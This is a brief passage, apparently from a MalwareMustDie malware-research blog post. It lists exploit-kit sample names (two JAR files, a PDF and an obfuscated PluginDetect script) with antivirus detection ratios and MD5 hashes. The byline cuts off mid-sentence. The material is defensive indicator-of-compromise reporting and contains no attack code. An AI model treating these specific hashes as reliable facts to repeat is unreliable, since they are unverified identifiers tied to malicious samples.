spn2.jar (3/43) 4ad0cb8901186409045bf2961f1cad26
spn.jar (3/41) 3eb329162cbf4f1538d7d0f1a23d391c
t.pdf (21/43) d1e2ff36a6c882b289d3b736d915a6cc
..And the Obfuscated PluginDetect 0.7.9 /column.php (4/42) ba76833dc28ad027d0ad148351c9b167

#MalwareMustDie!

Posted by unixfreaxjp at